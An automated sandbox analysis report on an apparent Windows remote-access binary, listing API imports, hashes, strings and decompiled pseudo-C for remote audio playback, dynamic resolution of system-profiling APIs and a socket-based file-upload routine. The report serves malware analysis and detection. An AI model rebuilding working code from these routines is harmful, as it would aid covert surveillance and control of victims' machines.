                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                  • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24,?,00408003), ref: 00407D84
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407DA4
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407DBE
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407DC8
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407DE8
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407E02
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407E0C
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407E2C
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$?c_str@?$basic_string@$G@2@@0@V?$basic_string@$G@2@@std@@$?size@?$basic_string@Hstd@@$File$??1?$basic_string@V10@V10@@exit$??8std@@CloseCreateNameOpenPathProcessSleepTemp$??0?$basic_string@??4?$basic_string@CurrentD@1@@ExecuteExistsHandleModuleMutexObjectQueryShellSingleV01@ValueWaitlstrcat
                                  • String ID: .exe$WDH$exepath$open$temp_
                                  • API String ID: 2802067201-3088914985
                                  • Opcode ID: ea03ed873efa06cf96c83a5a05f5e07c1e38d03e3efa50486efb3fa82d49440d
                                  • Instruction ID: 71612b700bd92f7f916ca3283b0c55b6d5dde9a5cbb5d2c431e2c067e6a7b7c7
                                  • Opcode Fuzzy Hash: ea03ed873efa06cf96c83a5a05f5e07c1e38d03e3efa50486efb3fa82d49440d
                                  • Instruction Fuzzy Hash: E5919772640608BBDB115BA0DC49FEF376DEB88341F10407AFA06E61D1DBB84995CBAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 25%
                                  			E00411D8A(WCHAR* __eax, char _a4, intOrPtr _a20, intOrPtr _a24, char _a27) {
                                  				char _v20;
                                  				char _v36;
                                  				char _v52;
                                  				char _v68;
                                  				char _v84;
                                  				char _v88;
                                  				char* _t35;
                                  				char* _t36;
                                  				char* _t37;
                                  				WCHAR* _t38;
                                  				void* _t43;
                                  				void* _t47;
                                  				intOrPtr* _t50;
                                  				intOrPtr _t78;
                                  				intOrPtr _t79;
                                  				intOrPtr _t86;
                                  				intOrPtr _t87;
                                  				intOrPtr* _t88;
                                  				void* _t91;
                                  
                                  				_t30 = __eax;
                                  				__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z(0x5c, 0);
                                  				if(__eax ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t30 = E004135DE();
                                  					_t91 = _t91 + 0xc;
                                  					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t30,  &_v36, 0x30, __eax);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				if(_t30 <= 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					if(PathFileExistsW(_t30) != 0) {
                                  						goto L4;
                                  					} else {
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                  						_t47 = E004020C2(0x41c178, 0xa8, 0x415664);
                                  					}
                                  				} else {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_a24, _t30);
                                  					E00412E4E(_t30);
                                  					_t91 = _t91 - 0x10 + 0x14;
                                  					L4:
                                  					_t35 =  &_v68;
                                  					L0041416A();
                                  					_t36 =  &_v52;
                                  					L00414146();
                                  					_t37 =  &_v36;
                                  					L0041414C();
                                  					_t38 =  &_v20;
                                  					L00414146();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t38, _t37, _t37, _t36, _t36, _t35, _t35, L"open \"",  &_a4, L"\" type ", E00412795( &_v84, _a20), L" alias audio");
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					mciSendStringW(_t38, 0, 0, 0);
                                  					mciSendStringA("play audio", 0, 0, 0);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                  					E004020C2(0x41c178, 0xa9, 0x415664);
                                  					_t43 = CreateEventA(0, 1, 0, 0);
                                  					 *0x41c1d4 = _t43;
                                  					if(_t43 != 0) {
                                  						do {
                                  							if( *0x41c1d2 != 0) {
                                  								mciSendStringA("pause audio", 0, 0, 0);
                                  								 *0x41c1d2 = 0;
                                  							}
                                  							if( *0x41c1d3 != 0) {
                                  								mciSendStringA("resume audio", 0, 0, 0);
                                  								 *0x41c1d3 = 0;
                                  							}
                                  							mciSendStringA("status audio mode",  &_v88, 0x14, 0);
                                  							_t50 = "stopped";
                                  							_t88 =  &_v88;
                                  							while(1) {
                                  								_t86 =  *_t88;
                                  								_t78 = _t86;
                                  								if(_t86 !=  *_t50) {
                                  									break;
                                  								}
                                  								if(_t78 == 0) {
                                  									L14:
                                  									_t50 = 0;
                                  								} else {
                                  									_t87 =  *((intOrPtr*)(_t88 + 1));
                                  									_t79 = _t87;
                                  									if(_t87 !=  *((intOrPtr*)(_t50 + 1))) {
                                  										break;
                                  									} else {
                                  										_t88 = _t88 + 2;
                                  										_t50 = _t50 + 2;
                                  										if(_t79 != 0) {
                                  											continue;
                                  										} else {
                                  											goto L14;
                                  										}
                                  									}
                                  								}
                                  								goto L18;
                                  							}
                                  							asm("sbb eax, eax");
                                  							asm("sbb eax, 0xffffffff");
                                  							L18:
                                  							if(_t50 == 0) {
                                  								SetEvent( *0x41c1d4);
                                  							}
                                  							if(WaitForSingleObject( *0x41c1d4, 0x1f4) == 0) {
                                  								CloseHandle( *0x41c1d4);
                                  								 *0x41c1d4 = 0;
                                  							}
                                  						} while ( *0x41c1d4 != 0);
                                  					}
                                  					mciSendStringA("stop audio", 0, 0, 0);
                                  					mciSendStringA("close audio", 0, 0, 0);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                  					_t47 = E004020C2(0x41c178, 0xaa, 0x415664);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t47;
                                  			}

                                  APIs
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,00000000,?,0041B310), ref: 00411D9B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DAE
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0041B310), ref: 00411DC7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0041B310), ref: 00411DD0
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0041B310), ref: 00411DD9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DEA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411DF9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,open ",?," type ,00000000, alias audio,?,0041B310), ref: 00411E2D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,0041B310), ref: 00411E3A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310), ref: 00411E47
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310), ref: 00411E54
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E5F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E68
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E71
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E7A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E86
                                  • mciSendStringW.WINMM(00000000), ref: 00411E8D
                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00411EA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411EB1
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9), ref: 00411ECB
                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00411EEE
                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00411F06
                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00411F1A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411F46
                                  • PathFileExistsW.SHLWAPI(00000000,?,0041B310), ref: 00411F4D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411F69
                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411F92
                                  • WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FA3
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FB3
                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00411FD3
                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00411FDD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411FED
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(000000AA), ref: 00412005
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041200E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@SendString$??0?$basic_string@D@2@@std@@D@std@@$?c_str@?$basic_string@G@2@@0@Hstd@@V?$basic_string@$D@1@@$EventV01@@V10@$??4?$basic_string@?find@?$basic_string@?length@?$basic_string@CloseCreateExistsFileG@1@@HandleObjectPathSingleV01@V10@0@V10@@Wait
                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                  • API String ID: 1753768752-1354618412
                                  • Opcode ID: 3c0475a647ad677730f7fda7c37286edd42fe688e11f07ff3ea9707cde87b4d9
                                  • Instruction ID: 390487820da651bbbca776db698e462f264097bfb23042b57de684319bca0ea3
                                  • Opcode Fuzzy Hash: 3c0475a647ad677730f7fda7c37286edd42fe688e11f07ff3ea9707cde87b4d9
                                  • Instruction Fuzzy Hash: E1618271A9061CFFDB00AFA0DC89DFF3B6DEB54344B448026F902971A1DB799D848B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00409908() {
                                  				_Unknown_base(*)()* _t2;
                                  				_Unknown_base(*)()* _t22;
                                  
                                  				_t2 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExA");
                                  				 *0x41bc94 = _t2;
                                  				if(_t2 == 0) {
                                  					 *0x41bc94 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                                  				}
                                  				 *0x41bc90 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
                                  				if( *0x41bc94 == 0) {
                                  					 *0x41bc90 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                                  				}
                                  				 *0x41bca0 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                                  				 *0x41c1e4 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                  				 *0x41c1e8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
                                  				 *0x41bc98 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
                                  				 *0x41bcd0 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
                                  				 *0x41bca4 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
                                  				 *0x41bc78 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
                                  				 *0x41bca8 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
                                  				_t22 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                                  				 *0x41bc9c = _t22;
                                  				return _t22;
                                  			}





                                   Instruction addresses: 0x00409924, 0x0040992c, 0x00409933, 0x00409944, 0x00409944, 0x0040995f, 0x00409964, 0x00409975, 0x00409975, 0x00409993, 0x004099a7, 0x004099bb, 0x004099cf, 0x004099e3, 0x004099f7, 0x00409a0b, 0x00409a1c, 0x00409a24, 0x00409a28, 0x00409a2e

                                  APIs
                                  • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,0041BA38,0041BCB0,00000000,00408F24,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040991B
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409924
                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040993F
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409942
                                  • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409953
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409956
                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409970
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409973
                                  • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409984
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409987
                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409998
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040999B
                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099AC
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099AF
                                  • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099C0
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099C3
                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099D4
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099D7
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099E8
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099EB
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099FC
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099FF
                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A10
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409A13
                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A21
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409A24
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$HandleModule$LibraryLoad
                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$user32
                                  • API String ID: 551388010-2914448473
                                  • Opcode ID: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                  • Instruction ID: 4c9355c828fc4da35060c465c8423d7dda30a1a04bb52c9e9a5aad065eac730d
                                  • Opcode Fuzzy Hash: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                  • Instruction Fuzzy Hash: F721AFB0E81358B9DA206BB56C4EFDB7E59DA94B54323442BB40893194EFBCC480CEDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                  • recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                  • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035BB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035CD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004035DE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,FileSize: ,00000000,?,?,?,?), ref: 004035FB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,FileSize: ,00000000,?,?,?,?), ref: 00403608
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403619
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040362A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403633
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004036F3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,0000FDE8,00000000), ref: 004036FE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403707
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(File Upload: unexpected disconnection,?), ref: 0040371F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?), ref: 0040372F
                                  Strings
                                  Memory Dump Source
